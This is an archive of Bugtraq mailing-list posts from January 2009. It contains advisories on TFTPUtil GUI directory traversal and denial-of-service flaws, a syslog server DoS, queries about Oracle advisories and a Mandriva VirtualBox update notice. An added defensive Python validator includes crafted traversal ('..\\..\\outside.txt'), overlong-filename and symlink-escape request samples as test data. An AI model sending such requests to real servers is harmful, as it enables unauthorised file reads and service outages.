Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id D8429237407; Thu, 15 Jan 2009 08:39:02 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24403 invoked from network); 14 Jan 2009 23:59:56 -0000
Date: Wed, 14 Jan 2009 17:04:35 -0700
Message-Id: <200901150004.n0F04ZJQ028021@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: vuln_research@princeofnigeria.org
To: bugtraq@securityfocus.com
Subject: TFTPUtil GUI TFTP Directory Traversal
Status:   

Title: TFTPUtil GUI TFTP Directory Traversal
Product: TFTPUtil GUI

Discovered: November 26, 2008
Discovered by: Rob Kraus, princeofnigeria (PoN)

Vendor: k23productions
Vendor URL: http://sourceforge.net/projects/tftputil
Vendor notification date: December 1, 2008
Vendor response date: December 8, 2008
Vendor acknowledgement: December 8, 2008
Vendor provided fix: December 8, 2008
Release coordinated with the vendor: --
Public disclosure date: January 14, 2009

Affects: TFTPUtil GUI versions 1.2.0 and 1.3.0
Fixed in: 1.4.0
Risk: Medium

Vulnerability Description: TFTPUtil GUI versions 1.2.0 and 1.3.0 are prone to a directory-traversal vulnerability because they fail to sanitize TFTP GET requests. By using a specially crafted TFTP GET request, an attacker is capable of retrieving files outside of the TFTP root directory.

Impact: The ability to obtain files outside of the TFTP root directory may allow an attacker to obtain more information about the underlying operating system and applications running on the host.

Keywords: security, vulnerability, tftp, directory traversal, princeofnigeria, gui, windows, server

[--Background--]

Type of vulnerability: Input validation flaw
Who can exploit it: Local and remote users

TFTPUtil GUI is an application that provides services for transferring configuration files, firmware files and other types of data using the TFTP protocol. The application should restrict GET requests to the contents of the TFTP root directory to prevent obtaining data from other parts of the host operating system.

Vulnerability Scope: The default installation of TFTPUtil 1.2.0 or 1.3.0 will allow exploitation of this vulnerability.

[--More Details--]

Exploitation of this flaw is trivial and can be executed using any RFC 1350 compliant TFTP client software. No exploit code is required.

[--Fix or Workaround Information--]

Patch availability: 1.4.0
Vendor provided fix: 1.4.0
Workarounds: Update to 1.4.0

[--Disclosure Policy--]

PrinceofNigeria.org Vulnerability Disclosure Policy
http://www.princeofnigeria.org/blogs/index.php/vulndev/vulnreleasepolicy/?blog=1

[--Disclosure History--]

Public disclosure date: January 14, 2009

[--References--]
CVE-ID:
Bugtraq ID:
Secunia ID:
OSVDB ID:

[--Author--]
Rob Kraus, princeofnigeria (PoN)
Website: www.princeofnigeria.org/blogs

From - Thu Jan 15 11:32:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059ee
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39187-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 75B0BED906
for <lists@securityspace.com>; Thu, 15 Jan 2009 11:24:11 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 0A74123740A; Thu, 15 Jan 2009 08:39:36 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24568 invoked from network); 15 Jan 2009 00:09:51 -0000
Date: Wed, 14 Jan 2009 17:16:07 -0700
Message-Id: <200901150016.n0F0G7Fs025883@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: vuln_research@princeofnigeria.org
To: bugtraq@securityfocus.com
Subject: TFTPUtil GUI TFTP Server Denial of Service Vulnerability
Status:   

[--Vulnerability Summary--]

Title: TFTPUtil GUI TFTP Server Denial of Service Vulnerability
Product: TFTPUtil GUI

Discovered: November 26, 2008
Discovered by: Rob Kraus, princeofnigeria (PoN)

Vendor: k23productions (as per various download sites)
Vendor URL: http://sourceforge.net/projects/tftputil
Vendor notification date: December 1, 2008
Vendor response date: December 8, 2008
Vendor acknowledgment: December 8, 2008
Vendor provided fix: December 8, 2008
Release coordinated with the vendor: --
Public disclosure date: January 14, 2009

Affects: TFTPUtil GUI versions 1.2.0 and 1.3.0
Fixed in: 1.4.0
Risk: High

Vulnerability Description: TFTPUtil GUI versions 1.2.0 and 1.3.0 are vulnerable to a remote denial-of-service vulnerability because they fail to handle user-supplied input. Sending a specially crafted TFTP request with an overlong filename will cause the application to become unstable and stop responding.

Impact: A remote or local attacker can exploit this flaw by sending a specially crafted packet to the TFTP server. Successful exploitation of this flaw will cause the TFTP server process to crash preventing valid users or devices from using the service. The TFTP server will need to be restarted to resume normal TFTP server operations.

Keywords: security, vulnerability, tftp, dos, princeofnigeria, gui, windows, server, denial, service

[--Background--]

Type of vulnerability: Input validation flaw
Who can exploit it: Local or Remote users

TFTPUtil GUI is an application that provides services for transferring configuration files, firmware files and other types of data using the TFTP protocol. The application should validate and sanitize all user input to prevent unexpected conditions.

Vulnerability Scope: The default installation of TFTPUtil 1.2.0 or 1.3.0 will allow exploitation of this vulnerability.

[--More Details--]

Exploitation of this flaw is trivial and can be executed using any RFC 1350 compliant TFTP client software. No exploit code is required.

[--Fix or Workaround Information--]

Patch availability: 1.4.0
Vendor provided fix: 1.4.0
Workarounds: Upgrading to version 1.4.0 addresses this vulnerability

[--Disclosure Policy--]

PrinceofNigeria.org Vulnerability Disclosure Policy
http://www.princeofnigeria.org/blogs/index.php/vulndev/vulnreleasepolicy/?blog=1

[--Disclosure History--]

Public disclosure date: January 14, 2009

[--References--]
CVE-ID:
Bugtraq ID:
Secunia ID:
OSVDB ID:

[--Author--]
Rob Kraus, princeofnigeria (PoN)
Website: www.princeofnigeria.org/blogs
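
Added example (not part of either advisory and not TFTPUtil's code): a server-side check of the kind both TFTPUtil advisories call for, parsing an RFC 1350 read/write request, bounding the filename field, and confining the resolved path to the TFTP root. The size limits, function names and sample packets are assumptions constructed for illustration; RFC 2347 option extensions are deliberately not handled.

```python
import os
import struct
import tempfile

OP_RRQ, OP_WRQ = 1, 2                 # RFC 1350 opcodes for read/write requests
MAX_REQUEST = 512                     # assumed cap on request datagram size
MAX_FILENAME = 255                    # assumed cap on the filename field
ALLOWED_MODES = {"netascii", "octet"}


class RequestRejected(Exception):
    """Raised when a request should be answered with a TFTP ERROR packet."""


def parse_request(packet):
    """Split an RRQ/WRQ into (opcode, filename, mode) or raise RequestRejected."""
    if not 4 <= len(packet) <= MAX_REQUEST:
        raise RequestRejected("bad request size")
    (opcode,) = struct.unpack("!H", packet[:2])
    if opcode not in (OP_RRQ, OP_WRQ):
        raise RequestRejected("not a read/write request")
    # RFC 1350 layout: opcode | filename | 0 | mode | 0
    fields = packet[2:].split(b"\x00")
    if len(fields) != 3 or fields[2] != b"":
        raise RequestRejected("malformed request")
    raw_name, raw_mode = fields[0], fields[1]
    if not raw_name or len(raw_name) > MAX_FILENAME:
        raise RequestRejected("filename length out of range")
    if any(b < 0x20 or b > 0x7E for b in raw_name):
        raise RequestRejected("non-printable byte in filename")
    mode = raw_mode.decode("ascii", "replace").lower()
    if mode not in ALLOWED_MODES:
        raise RequestRejected("unsupported mode")
    return opcode, raw_name.decode("ascii"), mode


def resolve_under_root(root, filename):
    """Map a requested name to a path that is guaranteed to lie inside root."""
    normalized = filename.replace("\\", "/")       # treat both separators alike
    if ":" in normalized or normalized.startswith("/"):
        raise RequestRejected("absolute or drive-qualified path")
    parts = [p for p in normalized.split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        raise RequestRejected("path traversal component")
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, *parts))
    # realpath follows symlinks, so a link pointing out of the root is caught here
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise RequestRejected("resolves outside root")
    return candidate


def validate_request(root, packet):
    """Full check: returns (opcode, safe_path) or raises RequestRejected."""
    opcode, filename, _mode = parse_request(packet)
    return opcode, resolve_under_root(root, filename)


def build_request(opcode, filename, mode=b"octet"):
    """Helper that builds constructed sample packets for the demo."""
    return struct.pack("!H", opcode) + filename + b"\x00" + mode + b"\x00"


def demo():
    """Run constructed sample requests against a temporary TFTP root."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "firmware.bin"), "wb") as fh:
            fh.write(b"constructed sample file")
        # Symlink inside the root that points at the root's parent directory.
        os.symlink(os.path.dirname(os.path.realpath(root)),
                   os.path.join(root, "link"))
        samples = {
            "valid": build_request(OP_RRQ, b"firmware.bin"),
            "traversal": build_request(OP_RRQ, b"..\\..\\outside.txt"),
            "overlong": build_request(OP_RRQ, b"A" * 300),
            "unterminated": build_request(OP_RRQ, b"firmware.bin")[:-1],
            "symlink": build_request(OP_RRQ, b"link/outside.txt"),
        }
        results = {}
        for name, packet in samples.items():
            try:
                validate_request(root, packet)
                results[name] = "accepted"
            except RequestRejected as exc:
                results[name] = "rejected: %s" % exc
        return results


if __name__ == "__main__":
    for name, verdict in demo().items():
        print("%-13s %s" % (name, verdict))
```
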

From - Thu Jan 15 11:38:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059ef
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39188-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C3A51ED879
for <lists@securityspace.com>; Thu, 15 Jan 2009 11:33:11 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 0499F23740B; Thu, 15 Jan 2009 08:40:37 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24679 invoked from network); 15 Jan 2009 00:16:10 -0000
Date: Wed, 14 Jan 2009 17:20:49 -0700
Message-Id: <200901150020.n0F0Knf7030408@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: vuln_research@princeofnigeria.org
To: bugtraq@securityfocus.com
Subject: Windows NTP Time Server Syslog Monitor 1.0.000 Denial of Service
 Vulnerability
Status:   

[--Vulnerability Summary--]

Title: Windows NTP Time Server Syslog Monitor 1.0.000 Denial of Service Vulnerability
Product: Windows NTP Time Server Syslog Monitor 1.0.000

Discovered: November 29, 2008
Discovered by: Rob Kraus, princeofnigeria (PoN)

Vendor: TimeTools
Vendor URL: http://www.timetools.co.uk
Vendor notification date: December 1, 2008
Vendor response date: --
Vendor acknowledgment: --
Vendor provided fix: --
Release coordinated with the vendor: --
Public disclosure date: January 14, 2009

Affects: Windows NTP Time Server Syslog Monitor 1.0.000
Fixed in: No fix currently available.
Risk: High

Vulnerability Description: Windows NTP Time Server Syslog Monitor 1.0.000 is vulnerable to a remote denial-of-service vulnerability because it fails to handle user-supplied input. Sending a specially crafted UDP Syslog request will cause the application to become unstable and stop responding.

Impact: A remote or local attacker can exploit this flaw by sending a specially crafted packet to the Syslog server. Successful exploitation of this flaw will cause the Syslog server process to crash preventing valid users or devices from using the service. The Syslog server will need to be restarted to resume normal Syslog server operations.

Keywords: security, vulnerability, syslog, princeofnigeria, windows, server, udp, dos, denial of service

[--Background--]

Type of vulnerability: Input validation flaw
Who can exploit it: Local or Remote users

Windows NTP Time Server Syslog Monitor 1.0.000 is an application that provides services for receiving system event messages to provide a centralized reporting interface for distributed system events. The application should validate and sanitize all user input to prevent unexpected conditions.

Per software download sites description: TimeTools Windows Atomic Clock NTP Server Syslog Daemon is a free utility that runs on any Windows NT/2000/XP/2003 workstation or server. It allows any syslog messages from any Linux or Unix based syslog client to be logged and displayed.

Vulnerability Scope: The default installation of Windows NTP Time Server Syslog Monitor 1.0.000 will allow exploitation of this vulnerability.

[--More Details--]

Exploitation of this flaw can be executed by sending a specially crafted UDP packet to the target server. No exploit code is required.

[--Fix or Workaround Information--]

Patch availability: None
Vendor provided fix: None
Workarounds: None available at this time, design flaw. Discontinue use of this product until a stable patch is released.

[--Disclosure Policy--]

PrinceofNigeria.org Vulnerability Disclosure Policy
http://www.princeofnigeria.org/blogs/index.php/vulndev/vulnreleasepolicy/?blog=1

[--Disclosure History--]

Public disclosure date: January 14, 2009

[--References--]
CVE-ID:
Bugtraq ID:
Secunia ID:
OSVDB ID:

[--Author--]
Rob Kraus, princeofnigeria (PoN)
Website: www.princeofnigeria.org/blogs

From - Thu Jan 15 11:42:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f0
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39189-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C9698ED8BE
for <lists@securityspace.com>; Thu, 15 Jan 2009 11:41:53 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 58D1323740E; Thu, 15 Jan 2009 08:41:08 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24963 invoked from network); 15 Jan 2009 00:37:15 -0000
Date: Thu, 15 Jan 2009 01:01:06 +0000 (UTC)
From: security curmudgeon <jericho@attrition.org>
To: bugtraq@securityfocus.com
Cc: trees@assurent.com, support@bea.com,
Oracle Security Alerts <secalert_us@oracle.com>
Subject: Re: Assurent VR - Oracle BEA WebLogic Server Apache Connector Buffer
 Overflow
In-Reply-To: <20090113225723.79AD368018E@sticky.vrt.telus.com>
Message-ID: <Pine.LNX.4.64.0901150040320.13704@forced.attrition.org>
References: <20090113225723.79AD368018E@sticky.vrt.telus.com>
X-Attrition: Attrition is only good when forced. http://attrition.org
X-OSVDB: Everything is vulnerable. http://osvdb.org
X-Message-Flag: WARNING: Over 75 security vulnerabilities in Microsoft Outlook as of Feb 15 2008!
X-Copyright: This e-mail copyright 2008 by jericho@attrition.org where applicable
X-Encryption: rot26
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Status:   



Hello Assurent & Oracle,

On Tue, 13 Jan 2009, VR-Subscription-noreply@assurent.com wrote:

: Oracle BEA WebLogic Server Apache Connector Buffer Overflow

: Reference: http://www.bea.com/weblogic/server/

: 2. Vulnerability Summary

: A remotely exploitable vulnerability has been discovered in the Apache 
: Connector component of Oracle BEA WebLogic Server. Specifically, the 
: vulnerability is due to a boundary error when processing incoming HTTP 
: requests and can lead to a buffer overflow condition. This boundary 
: error can lead to a Denial of Service (DoS) condition for the Apache 
: HTTP server.

: 3. Vulnerability Analysis

: A remote unauthenticated attacker can exploit the vulnerability by 
: sending a malicious HTTP request to the target system. A successful 
: attack will result in a Denial of Service (DoS) condition for the Apache 
: HTTP server, including all Apache-negotiated HTTP traffic to the 
: WebLogic Server.

: Reference: https://support.bea.com/application_content/product_portlets/securityadvisories/2809.html

According to Assurent, this is a remote overflow that creates a DoS 
condition. No mention of running arbitrary code.

Oracle's advisory says:

CVSS Severity Score: 10.0 (High)
Attack Range (AV): Network
Attack Complexity (AC): Low 
Authentication Level (Au): None 
Impact Type:Complete confidentiality, integrity and availability violation 
Vulnerability Type: Denial of Service 
CVSS Base Score Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)

So it is a "Denial of Service" but results in a complete compromise of 
confidentiality, integrity and availability. A 10.0 score typically means 
remote, unauthenticated execution of attacker-controlled code. Which is 
correct?

Further, Oracle's advisory says this affects "Security vulnerability in 
WebLogic plug-ins for Apache, Sun and IIS Web servers", implying this 
affects multiple plug-ins, not just the one for Apache. The advisory also 
uses this wording further suggesting three separate plug-ins: "This 
vulnerability may impact the availability, confidentiality or integrity of 
WebLogic Server applications, which use the Apache, Sun or IIS web server 
configured with the WebLogic plug-in for Apache, Sun or IIS respectively."

Is it really one plug-in that works with all three? Or does this only 
affect an Apache plug-in?

From - Thu Jan 15 11:52:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f1
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39190-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 7C4E7ED946
for <lists@securityspace.com>; Thu, 15 Jan 2009 11:52:05 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id DC71323740F; Thu, 15 Jan 2009 08:41:28 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29594 invoked from network); 15 Jan 2009 01:58:42 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=OiwHJyw95A9GqVJ-TlkA:9 a=ClWkUrfSGXZlQU7twDwA:7 a=WmnnRX-Gkimm3A8DqAKQPJH77f0A:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:011 ] virtualbox
Date: Wed, 14 Jan 2009 19:29:00 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LNHyf-0003Cq-39@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:011
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : virtualbox
 Date    : January 14, 2009
 Affected: 2008.0, 2008.1, 2009.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability has been discovered and corrected in VirtualBox,
 affecting versions prior to 2.0.6, which allows local users
 to overwrite arbitrary files via a symlink attack on a
 /tmp/.vbox-qateam-ipc/lock temporary file (CVE-2008-5256).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5256
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 0faad982e37288846205d6d33d590ee1  2008.0/i586/dkms-vboxadd-1.5.0-6.1mdv2008.0.i586.rpm
 ec69afc3908bd606bae77b8422e39558  2008.0/i586/dkms-vboxvfs-1.5.0-6.1mdv2008.0.i586.rpm
 c27d1bd07d9dc67f4cefbdf33472acca  2008.0/i586/dkms-virtualbox-1.5.0-6.1mdv2008.0.i586.rpm
 9964702ee96bcf6c6edf0c31835d20e7  2008.0/i586/virtualbox-1.5.0-6.1mdv2008.0.i586.rpm
 435eb23fb1847074783ee59f21afa05d  2008.0/i586/virtualbox-guest-additions-1.5.0-6.1mdv2008.0.i586.rpm
 dbf4cd4d51e6690ed54a01751d7eb6e3  2008.0/i586/x11-driver-input-vboxmouse-1.5.0-6.1mdv2008.0.i586.rpm
 89984e4e53d3eda593e1a384b97acd14  2008.0/i586/x11-driver-video-vboxvideo-1.5.0-6.1mdv2008.0.i586.rpm 
 d0edb2542a83e4ab966bb9990b9c3a88  2008.0/SRPMS/virtualbox-1.5.0-6.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 0bfb5b9d8c8a16f1e04fd490e6379e63  2008.0/x86_64/dkms-virtualbox-1.5.0-6.1mdv2008.0.x86_64.rpm
 3bc3251552c50c2ba8270a69c5f353d7  2008.0/x86_64/virtualbox-1.5.0-6.1mdv2008.0.x86_64.rpm 
 d0edb2542a83e4ab966bb9990b9c3a88  2008.0/SRPMS/virtualbox-1.5.0-6.1mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 c4e028f64685550f1b54d658cac8033c  2008.1/i586/dkms-vboxadd-1.5.6-1.1mdv2008.1.i586.rpm
 0ba02b82975789a2e074562c266e3880  2008.1/i586/dkms-vboxvfs-1.5.6-1.1mdv2008.1.i586.rpm
 91fb1e876d76370c40f2bc20271dcdbb  2008.1/i586/dkms-virtualbox-1.5.6-1.1mdv2008.1.i586.rpm
 42dd201c14fab3dd1ff218969f88612c  2008.1/i586/virtualbox-1.5.6-1.1mdv2008.1.i586.rpm
 5feeef63896de6093cdd6365258df60d  2008.1/i586/virtualbox-guest-additions-1.5.6-1.1mdv2008.1.i586.rpm
 3d3fc94cb178e2a6853679f01f7f4198  2008.1/i586/x11-driver-input-vboxmouse-1.5.6-1.1mdv2008.1.i586.rpm
 79b78be2abe7b3a6d8e95d547139afa4  2008.1/i586/x11-driver-video-vboxvideo-1.5.6-1.1mdv2008.1.i586.rpm 
 6c18b42e2ff43d79009dedc817fa19e9  2008.1/SRPMS/virtualbox-1.5.6-1.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 4d261638ff0134079fa6c52d0a368664  2008.1/x86_64/dkms-virtualbox-1.5.6-1.1mdv2008.1.x86_64.rpm
 6ccec4ff2f35d1308f73e10679651ce0  2008.1/x86_64/virtualbox-1.5.6-1.1mdv2008.1.x86_64.rpm 
 6c18b42e2ff43d79009dedc817fa19e9  2008.1/SRPMS/virtualbox-1.5.6-1.1mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 53e13912d97abe5b7044887eab1028fd  2009.0/i586/dkms-vboxadd-2.0.2-2.1mdv2009.0.i586.rpm
 9441661b095cf9c65c50c3a81f1fb89b  2009.0/i586/dkms-vboxvfs-2.0.2-2.1mdv2009.0.i586.rpm
 2977fa2971f66d6b554ab73f03b80ba6  2009.0/i586/dkms-virtualbox-2.0.2-2.1mdv2009.0.i586.rpm
 acddf8b8a168c148f1f5e7a548a610bd  2009.0/i586/virtualbox-2.0.2-2.1mdv2009.0.i586.rpm
 edfc2bc624a87ab96f238345fbe38529  2009.0/i586/virtualbox-guest-additions-2.0.2-2.1mdv2009.0.i586.rpm
 e3650d3c5fedb2dccdc4a2e108414b95  2009.0/i586/x11-driver-input-vboxmouse-2.0.2-2.1mdv2009.0.i586.rpm
 6d28714532427680f82c86fe34fee3e0  2009.0/i586/x11-driver-video-vboxvideo-2.0.2-2.1mdv2009.0.i586.rpm 
 93f4904d403da2dd75ca4d444d298846  2009.0/SRPMS/virtualbox-2.0.2-2.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 667f19d7803c5eb163364ce221b367be  2009.0/x86_64/dkms-vboxadd-2.0.2-2.1mdv2009.0.x86_64.rpm
 e4439eb5b8a5ef7e09924989058a69b8  2009.0/x86_64/dkms-vboxvfs-2.0.2-2.1mdv2009.0.x86_64.rpm
 3da3bc075de10484211b0da29a0a14cc  2009.0/x86_64/dkms-virtualbox-2.0.2-2.1mdv2009.0.x86_64.rpm
 1aba902daf9019cbcf4e62e8a64d0a82  2009.0/x86_64/virtualbox-2.0.2-2.1mdv2009.0.x86_64.rpm
 da486be54760b618a3d84e23c3ad067e  2009.0/x86_64/virtualbox-guest-additions-2.0.2-2.1mdv2009.0.x86_64.rpm
 a3adf7c94132553f43dc6a0cd765bcc8  2009.0/x86_64/x11-driver-input-vboxmouse-2.0.2-2.1mdv2009.0.x86_64.rpm
 ca82cc1b8e6b5d85d1a7601a37367562  2009.0/x86_64/x11-driver-video-vboxvideo-2.0.2-2.1mdv2009.0.x86_64.rpm 
 93f4904d403da2dd75ca4d444d298846  2009.0/SRPMS/virtualbox-2.0.2-2.1mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>

Date: Thu, 15 Jan 2009 06:46:51 +0000 (UTC)
From: security curmudgeon <jericho@attrition.org>
To: bugtraq@securityfocus.com
Cc: secalert_us@oracle.com, CVE <cve@mitre.org>
Subject: Re: iDefense Security Advisory 01.13.09: Oracle Secure Backup
 Administration Server login.php Command Injection Vulnerability


iDefense, CVE or Oracle;

The two iDefense advisories present a bit of confusion over the CVE 
assignments and number of vulnerabilities. There appear to be two 
vulnerabilities (login.php and common.php) that may have 3 CVE numbers 
assigned. Could anyone clarify?

First advisory, mail list post and original jibe suggesting common.php 
issue is CVE-2008-5449:

iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration 
Server login.php Command Injection Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2009-01/0111.html
The vulnerability is in a function of common.php which is called from the 
login.php page.
The Common Vulnerabilities and Exposures (CVE) project has assigned the 
name CVE-2008-5449 to this issue.

Oracle Secure Backup Administration Server login.php Command Injection 
Vulnerability
http://labs.idefense.com/intelligence/vulnerabilities/display.php?idv9
The vulnerability is in a function of common.php which is called from the 
login.php page.
The Common Vulnerabilities and Exposures (CVE) project has assigned the 
name CVE-2008-5449 to this issue.


Second advisory, mail list post and original do not match, mentioning 
CVE-2008-4006 and then CVE-2008-5448 for what appear to be login.php and 
common.php. This implies that common.php may have had two CVEs assigned:

iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration 
Server login.php Command Injection Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2009-01/0110.html
The first vulnerability is in "php/login.php".
The second vulnerability is in "php/common.php". 
The Common Vulnerabilities and Exposures (CVE) project has assigned the 
name CVE-2008-4006 to this issue.

Oracle Secure Backup Administration Server login.php Command Injection 
Vulnerability
http://labs.idefense.com/intelligence/vulnerabilities/display.php?idv8
The first vulnerability is in "php/login.php". 
The second vulnerability is in "php/common.php".
The Common Vulnerabilities and Exposures (CVE) project has assigned the 
names CVE-2008-4006 and CVE-2008-5448 to this issue. 


Any clarification would be appreciated.

Date: Thu, 15 Jan 2009 17:24:48 +0800
From: "noreply-secresearch@fortinet.com" <noreply-secresearch@fortinet.com>
To: "full-disclosure" <full-disclosure@lists.grok.org.uk>,
"bugtraq" <bugtraq@securityfocus.com>
Subject: Oracle Secure Backup Multiple Denial Of Service vulnerabilities

Date: Thu, 15 Jan 2009 17:25:58 +0800
From: "noreply-secresearch@fortinet.com" <noreply-secresearch@fortinet.com>
To: "full-disclosure" <full-disclosure@lists.grok.org.uk>,
"bugtraq" <bugtraq@securityfocus.com>
Subject: Oracle Secure Backup's observiced.exe Denial Of Service vulnerability

Date: Thu, 15 Jan 2009 17:26:45 +0800
From: "noreply-secresearch@fortinet.com" <noreply-secresearch@fortinet.com>
To: "full-disclosure" <full-disclosure@lists.grok.org.uk>,
"bugtraq" <bugtraq@securityfocus.com>
Subject: Oracle Secure Backup NDMP_CONECT_CLIENT_AUTH Command Buffer Overflow Vulnerability

Date: Thu, 15 Jan 2009 12:56:14 +0000
From: Adam Laurie <adam@algroup.co.uk>
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: ANNOUNCE: apache_1.3.41+ssl_1.60 released

